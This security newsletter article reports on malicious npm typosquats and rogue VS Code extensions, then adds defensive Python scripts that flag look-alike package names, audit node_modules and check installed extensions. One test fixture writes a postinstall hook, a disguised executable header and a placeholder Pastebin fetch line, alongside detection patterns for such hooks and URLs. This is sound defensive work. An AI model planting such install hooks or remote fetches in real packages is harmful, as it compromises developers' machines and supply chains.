
Malicious Typosquats Target npm Packages and Visual Studio Code Extensions

Threat actors have been actively uploading malicious typosquats of legitimate npm packages, such as typescript-eslint and @types/node, to the npm registry


CYBER SYRUP
Delivering the sweetest insights on cybersecurity.



Threat actors have been actively uploading malicious typosquats of legitimate npm packages, such as typescript-eslint and @types/node, to the npm registry. These counterfeit packages, named @typescript_eslinter/eslint and types-node, are designed to download trojans and retrieve second-stage payloads, posing a significant threat to developers and organizations alike.

The Attack

Efforts to Mimic Legitimate Packages

According to an analysis by Sonatype's Ax Sharma, the effort the attackers invested in mimicking legitimate packages is alarming. The npm packages in question racked up thousands of downloads, suggesting that some developers unintentionally pulled them into their projects. Sonatype also notes that download counts may have been artificially inflated by the threat actors to lend the packages an air of legitimacy, so the raw figure is not a reliable measure of how many real victims there were.
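The two counterfeit names share a pattern: one flattens a scope into a hyphen (types-node for @types/node), the other pads a real name with an extra syllable and moves it into a look-alike scope (@typescript_eslinter/eslint for typescript-eslint). The following added example, written for this page and not taken from Sonatype or any project, checks a package.json against an allowlist of expected dependency names using both tricks. The allowlist, the sample manifest and the edit-distance threshold are assumptions chosen for illustration.

```python
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Assumed allowlist: the names this project is known to depend on. Extend for your own tree.
LEGITIMATE_PACKAGES = [
    "typescript-eslint",
    "@typescript-eslint/eslint-plugin",
    "@types/node",
    "eslint",
    "prettier",
]

# Constructed package.json containing the two counterfeit names next to their genuine counterparts.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-app",
  "dependencies": {
    "@types/node": "^22.0.0",
    "types-node": "^1.0.0"
  },
  "devDependencies": {
    "eslint": "^9.0.0",
    "@typescript_eslinter/eslint": "^1.0.0"
  }
}"""

SAME_NAME = "same name once the scope marker and separators are removed"
NEAR_MISS = "within edit distance of a legitimate name"


@dataclass(frozen=True)
class Finding:
    dependency: str
    legitimate: str
    reason: str


def normalize(name: str) -> str:
    """Collapse case and strip '@', '/', '-', '_' and '.' so scope games cannot hide a match."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def comparable_forms(name: str) -> set[str]:
    """Forms worth comparing: the whole name and, for scoped packages, the scope on its own."""
    forms = {normalize(name)}
    if name.startswith("@") and "/" in name:
        forms.add(normalize(name[1:].split("/", 1)[0]))
    return forms


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute), O(len(a) * len(b))."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))
        previous = current
    return previous[-1]


def load_dependencies(package_json: str) -> list[str]:
    """Every dependency name declared in the manifest, across all dependency sections."""
    manifest = json.loads(package_json)
    names: list[str] = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        names.extend(manifest.get(section, {}))
    return names


def find_typosquats(dependencies, legitimate=LEGITIMATE_PACKAGES, max_distance=2, min_length=5):
    """Flag dependencies that collapse onto, or sit within a few edits of, an allowlisted name."""
    findings: list[Finding] = []
    for dep in dependencies:
        if dep in legitimate:
            continue
        for legit in legitimate:
            if normalize(dep) == normalize(legit):
                findings.append(Finding(dep, legit, SAME_NAME))
                continue
            # min_length stops short scopes such as "types" from matching everything
            distances = [
                levenshtein(x, y)
                for x in comparable_forms(dep)
                for y in comparable_forms(legit)
                if min(len(x), len(y)) >= min_length
            ]
            if distances and min(distances) <= max_distance:
                findings.append(Finding(dep, legit, NEAR_MISS))
    return findings


if __name__ == "__main__":
    for f in find_typosquats(load_dependencies(SAMPLE_PACKAGE_JSON)):
        print(f"{f.dependency!r} resembles {f.legitimate!r}: {f.reason}")
```

Run against the constructed manifest, the script reports types-node as the scope-flattened twin of @types/node and @typescript_eslinter/eslint as a near miss for both typescript-eslint and the @typescript-eslint scope, while the genuine eslint and @types/node entries pass. Comparing the scope on its own matters because the attacker's extra characters live in the scope, where a whole-name comparison would dilute them.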

Malicious Packages and Their Behavior

@typescript_eslinter/eslint

  • Details:

    • Linked to a fake GitHub repository created on November 29, 2024, by an account named "typescript-eslinter."

    • Contains a file named prettier.bat, which is actually a Windows executable (.exe) flagged as a trojan and dropper on VirusTotal.

  • Behavior:

    • Copies itself into the Windows Startup folder, so it is launched at every user logon (and therefore after every reboot).

types-node

  • Details:

    • Fetches malicious scripts from a Pastebin URL, which then execute a trojan masquerading as npm.exe.

Both packages were designed to exploit the trust developers place in widely-used open-source libraries.
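Both behaviours leave artifacts that are cheap to check for after an install: a file whose name says batch script but whose first two bytes are the MZ header of a Windows executable, and an install-time lifecycle hook (or the script it runs) that reaches out to a paste site. The following added example, written for this page rather than taken from Sonatype or either package, walks a node_modules tree and reports both. The fixture it builds is constructed to mirror the two descriptions above; in particular, wiring prettier.bat to a postinstall hook and the placeholder Pastebin URL are assumptions, not details the article gives.

```python
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
PE_EXTENSIONS = {".exe", ".dll", ".node", ".sys"}        # names under which an MZ header is expected
SCRIPT_EXTENSIONS = {".js", ".cjs", ".mjs", ".bat", ".cmd", ".ps1", ".sh"}
PASTE_HOSTS = {"pastebin.com"}                            # assumption: extend with other paste sites
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def is_disguised_pe(path: Path) -> bool:
    """True when a file not named like a PE nevertheless starts with the MZ magic bytes."""
    if path.suffix.lower() in PE_EXTENSIONS:
        return False
    with path.open("rb") as fh:
        return fh.read(2) == b"MZ"


def url_findings(text: str) -> list[tuple[str, str]]:
    """Classify every URL in a string as a paste-site fetch or a generic remote URL."""
    out = []
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname or ""
        out.append(("paste-site-url" if host in PASTE_HOSTS else "remote-url", url))
    return out


def audit_package(pkg_dir: Path) -> list[tuple[str, str]]:
    """Findings for one installed package as (kind, detail) pairs."""
    findings: list[tuple[str, str]] = []
    manifest = pkg_dir / "package.json"
    scripts = json.loads(manifest.read_text(encoding="utf-8")).get("scripts", {}) if manifest.exists() else {}
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(("lifecycle-hook", f"{hook}: {scripts[hook]}"))
            findings.extend(url_findings(scripts[hook]))
    for path in sorted(p for p in pkg_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(pkg_dir).as_posix()
        if is_disguised_pe(path):
            findings.append(("disguised-pe", f"{rel} starts with MZ but is named {path.suffix!r}"))
        elif path.suffix.lower() in SCRIPT_EXTENSIONS:
            text = path.read_bytes().decode("utf-8", errors="ignore")
            findings.extend((kind, f"{rel}: {url}") for kind, url in url_findings(text))
    return findings


def audit_node_modules(node_modules: Path) -> dict[str, list[tuple[str, str]]]:
    """Audit every package directory, handling the @scope/name layout."""
    report: dict[str, list[tuple[str, str]]] = {}
    for entry in sorted(node_modules.iterdir()):
        pkg_dirs = sorted(entry.iterdir()) if entry.name.startswith("@") else [entry]
        for pkg_dir in pkg_dirs:
            if pkg_dir.is_dir():
                report[pkg_dir.relative_to(node_modules).as_posix()] = audit_package(pkg_dir)
    return report


def build_sample_tree(root: Path) -> Path:
    """Constructed fixture mimicking the two behaviours described above; not the real packages."""
    nm = root / "node_modules"
    squat = nm / "@typescript_eslinter" / "eslint"
    squat.mkdir(parents=True)
    (squat / "package.json").write_text(json.dumps(
        {"name": "@typescript_eslinter/eslint", "scripts": {"postinstall": "prettier.bat"}}))
    (squat / "prettier.bat").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)   # PE header under a .bat name
    fetcher = nm / "types-node"
    fetcher.mkdir(parents=True)
    (fetcher / "package.json").write_text(json.dumps(
        {"name": "types-node", "scripts": {"postinstall": "node install.js"}}))
    (fetcher / "install.js").write_text('fetch("https://pastebin.com/raw/EXAMPLE");  // placeholder\n')
    genuine = nm / "@types" / "node"
    genuine.mkdir(parents=True)
    (genuine / "package.json").write_text(json.dumps({"name": "@types/node"}))
    (genuine / "index.d.ts").write_text("export {};\n")
    return nm


def run_demo() -> dict[str, list[tuple[str, str]]]:
    """Build the fixture in a temp dir, audit it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_node_modules(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for pkg, findings in run_demo().items():
        print(pkg, "(clean)" if not findings else "")
        for kind, detail in findings:
            print(f"  [{kind}] {detail}")
```

On the fixture, the genuine @types/node comes back clean, the @typescript_eslinter/eslint directory is flagged for its lifecycle hook and for prettier.bat carrying a PE header, and types-node is flagged for its hook and the Pastebin fetch. Pointing audit_node_modules at a real project's node_modules is the intended use; any lifecycle hook is worth a look regardless of whether it fetches anything, which is why the script reports hooks on their own.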

Broader Campaign Targeting Visual Studio Code

Targeting VSCode Extensions

In addition to npm packages, threat actors have targeted the Visual Studio Code (VSCode) Marketplace. ReversingLabs identified several malicious extensions uploaded to the marketplace in October 2024. These extensions impersonated tools for blockchain development and video conferencing applications like Zoom.

Malicious VSCode Extensions

The following rogue VSCode extensions, now removed, were part of this campaign:

  • EVM.Blockchain-Toolkit

  • VoiceMod.VoiceMod

  • ZoomVideoCommunications.Zoom

  • Ethereum.SoliditySupport

  • SolidityFoundation.Solidity-Ethereum

  • GavinWood.SolidityLang

  • And others.

Behavior

These extensions included obfuscated JavaScript code designed to download second-stage payloads from remote servers. The final payload remains unknown, but the evolving sophistication of these extensions underscores a deliberate effort to compromise developers’ environments.

Implications for Developers and Organizations

Threat to Supply Chain Security

The attack highlights structural weaknesses in open-source ecosystems and integrated development environments (IDEs): anyone can publish under a plausible name, and install-time hooks and extensions run with the developer's full privileges. Malicious code pulled in as a dependency can compromise not only an individual developer's machine but also the build and deployment pipelines it feeds within an enterprise.

Potential for Enterprise Compromise

Compromising an IDE or a widely-used package repository could serve as a foothold for attackers to infiltrate corporate systems, steal sensitive data, or disrupt critical business operations.

Recommendations for Protection

To mitigate these risks, developers and organizations should take the following steps:

  1. Verify Package Authenticity

    • Double-check package names for typosquats and validate repositories before downloading.

    • Use tools like Sonatype’s Nexus and GitHub’s Dependabot to monitor dependencies for vulnerabilities.

  2. Enable Code Scanning

    • Employ automated tools to analyze packages and extensions for malicious or obfuscated code.

  3. Implement Multi-Factor Authentication (MFA)

    • Secure developer accounts on platforms like npm, GitHub, and IDE marketplaces with MFA to prevent unauthorized access.

  4. Restrict IDE Extensions

    • Limit the installation of extensions to verified publishers. Regularly audit installed extensions for unusual behavior.

  5. Adopt Secure Development Practices

    • Use sandboxed environments to test third-party tools and dependencies before integrating them into projects.
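Step 4 above is easy to turn into a recurring check. The following added example, written for this page and not part of any vendor's tooling, takes the output of `code --list-extensions --show-versions`, compares each installed extension ID against an allowlist, and separately calls out IDs whose name contains the name of an allowed extension under a different publisher, the pattern the Solidity impostors listed above follow. The allowlist and the sample listing are constructed assumptions; the three unexpected IDs in the listing are taken from the ReversingLabs list above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumed enterprise allowlist of full extension IDs (publisher.name).
ALLOWED_EXTENSIONS = {
    "ms-python.python",
    "dbaeumer.vscode-eslint",
    "esbenp.prettier-vscode",
    "JuanBlanco.solidity",
}

# Constructed stand-in for `code --list-extensions --show-versions` output.
SAMPLE_LISTING = """\
ms-python.python@2024.20.0
esbenp.prettier-vscode@11.0.0
JuanBlanco.solidity@0.0.174
SolidityFoundation.Solidity-Ethereum@0.0.2
GavinWood.SolidityLang@0.0.1
ZoomVideoCommunications.Zoom@1.0.3
"""


@dataclass(frozen=True)
class ExtensionFinding:
    extension_id: str
    verdict: str               # "allowed", "look-alike" or "not-allowed"
    resembles: str | None = None


def parse_listing(listing: str) -> list[tuple[str, str]]:
    """Split `publisher.name@version` lines into (extension_id, version) pairs."""
    items = []
    for line in listing.splitlines():
        line = line.strip()
        if line:
            ext_id, _, version = line.partition("@")
            items.append((ext_id, version))
    return items


def normalized_name(ext_id: str) -> str:
    """The name part of an ID with case and separators removed, for impersonation checks."""
    name = ext_id.split(".", 1)[1] if "." in ext_id else ext_id
    return re.sub(r"[^a-z0-9]", "", name.lower())


def audit_extensions(listing: str, allowed=ALLOWED_EXTENSIONS) -> list[ExtensionFinding]:
    """Classify every installed extension against the allowlist."""
    allowed_lower = {a.lower() for a in allowed}
    findings: list[ExtensionFinding] = []
    for ext_id, _version in parse_listing(listing):
        if ext_id.lower() in allowed_lower:
            findings.append(ExtensionFinding(ext_id, "allowed"))
            continue
        name = normalized_name(ext_id)
        # An allowed extension's name (4+ chars) embedded in a foreign publisher's name is a look-alike.
        twin = next(
            (a for a in sorted(allowed) if len(normalized_name(a)) >= 4 and normalized_name(a) in name),
            None,
        )
        findings.append(ExtensionFinding(ext_id, "look-alike" if twin else "not-allowed", twin))
    return findings


def removal_commands(findings: list[ExtensionFinding]) -> list[str]:
    """One `code --uninstall-extension` invocation per extension that is not on the allowlist."""
    return [f"code --uninstall-extension {f.extension_id}" for f in findings if f.verdict != "allowed"]


if __name__ == "__main__":
    results = audit_extensions(SAMPLE_LISTING)
    for f in results:
        suffix = f" (resembles {f.resembles})" if f.resembles else ""
        print(f"{f.verdict:11} {f.extension_id}{suffix}")
    print("\n".join(removal_commands(results)))
```

On the sample listing the two Solidity impostors are reported as look-alikes of JuanBlanco.solidity, the Zoom extension is simply not on the allowlist, and three uninstall commands are produced. In practice the listing comes from running the real `code --list-extensions --show-versions` on each workstation; treating the look-alike verdict as a stronger signal than a plain allowlist miss helps triage, because it is the pattern a typosquatter relies on.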

Conclusion

The recent typosquatting and VSCode extension attacks highlight the growing sophistication of threat actors targeting the software development lifecycle. By masquerading as trusted tools, these campaigns aim to introduce malicious code into developer environments, potentially affecting millions of users downstream.

Developers and organizations must prioritize robust security measures and remain vigilant to safeguard their projects and systems from supply chain threats. As the open-source ecosystem continues to grow, so does the need for proactive defenses to combat malicious activities.